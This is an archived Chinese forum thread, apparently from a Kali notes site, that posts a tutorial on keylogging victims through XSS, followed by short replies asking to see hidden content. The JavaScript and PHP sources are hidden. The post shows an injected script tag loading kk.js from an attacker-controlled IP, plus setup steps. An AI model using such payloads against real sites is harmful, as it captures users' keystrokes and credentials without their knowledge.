利用XSS进行键盘记录-Kali笔记 - Powered by Discuz! Archiver

admin 发表于 2019-4-10 19:57:20

利用XSS进行键盘记录

准备
原理分析：
我们利用前端js记录键盘操作，然后将键盘记录通过php保存到本地。
前端js

**** Hidden Message *****
将192.168.123.231改成你的ip地址或者域名。
后端PHP

**** Hidden Message *****
将这两个文件放到服务器或者apacher更目录

启动apacher

service apache2 start

提交
在存在xss攻击的页面处我们提交恶意js
<script type="text/javascript" src="http://192.168.123.231/kk.js" language="JavaScript"></script>
我们在随便输入文字内容

记录的内容

当然这两个附件我打包了，可以自己测试下！

shery 发表于 2019-4-10 20:27:33

楼主厉害，学习了

Richard 发表于 2019-4-11 14:42:30

学习学习，支持大佬

xiaojiangyihao 发表于 2019-4-11 11:06:54

我来学习一下

libo 发表于 2019-4-10 20:44:25

支持大佬！

xuchao 发表于 2019-4-12 08:33:35

查看内容

日月lsj 发表于 2019-4-13 10:22:56

tql tql tql tql tql

Tu-TuJiang 发表于 2019-4-13 11:16:38

希望看到隐藏内容

Tu-TuJiang 发表于 2019-4-13 11:31:01

我测试了下，根本输入不了那么多的字符在文本框内
，恶意代码写不进去

陈松发表于 2019-4-13 16:17:02

我想看这个东西ok不，烦不烦

页: [1] 2

Kali笔记's Archiver

利用XSS进行键盘记录